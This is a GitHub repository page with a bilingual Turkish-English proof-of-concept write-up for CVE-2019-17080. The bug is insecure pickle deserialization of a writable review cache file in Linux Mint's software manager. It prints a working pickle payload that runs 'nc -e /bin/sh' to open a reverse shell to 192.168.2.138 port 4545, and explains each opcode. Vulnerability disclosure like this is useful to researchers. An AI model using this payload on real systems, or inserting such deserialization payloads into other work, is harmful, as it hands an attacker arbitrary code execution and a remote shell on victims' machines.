Skip to content
CVE-2019-17080
Python
Branch: master
Clone or download
Latest commit ae7476f Oct 8, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
imgs Add files via upload Oct 2, 2019
README.md
exploit.py

README.md

[TR] Linux mint yazılım yöneticisi (v 7.9.5/9) yanlış yapılandırmadan dolayı obje enjeksiyonu ve keyfi kod çalıştırmamıza neden olmaktadır.

[EN] Linux mint software manager (v 7.9.5/9) causes us to execute object injection and arbitrary code due to incorrect configuration

mintinsall

[TR] Mint yazılım yöneticisini çalıştırdıgımız da yeni yorum olup olmadıgını kontrol ediyor eger yeni yorum varsa new-reviews.list adresinden indirip dosyaya yazıyor.

[EN] If there is a new comment new-reviews.list download from and write to file.

code mintinstall.py

[TR] Yazılım yöneticisini ilk başladıgında , reviews modülünden ReviewCache() sınıfını çağırıyor.

[EN] When the software manager first starts, it calls the ReviewCache() class from the reviews module.

Verileri Nasıl İşliyor?

How Does It Process Data?

code reviews.py

[TR] ReviewCache sınıfı başladıgında(init) _load_cache() fonksiyonunu çagırıyor.

[EN] When the ReviewCache class starts (init) it calls _load_cache()

[TR] Load cache fonksiyonu REVIEWS_CACHE degişkeninde olan dosyayı okuyup pickle modülü yardımıyla dosyanın içinde ki datayı unserialize ediyor ve bazı değerleri hafıza da tutuyor.

[EN] The Load cache function reads the file in the REVIEWS_CACHE variable and unserializes the data in the file with the help of the pickle module and holds some values in memory.

[TR] Dosyayı kontrol ettigimde yazma iznim oldugu görünüyor.

[EN] When I check the file, it looks like I'm allowed to write.

[TR] Pickle modülü yardımıyla serialize/unserialize işlemleri gerçekleştirebildigimizden, reduce metodu kullanarak modül dahil edip keyfi kod yürütebiliriz.

[EN] Pickle since we can perform serialize/unserialize operations with the module, we can include the module and execute arbitrary code using the reduce method.

[TR] Bu durumda eğer dosya unserialize edilmeye çalışılırsa zararlı kodumuz çalışacaktır.

[EN] If you attempt to unserialize the file, our malicious code will work.

cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi 
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

alt-text

You can’t perform that action at this time.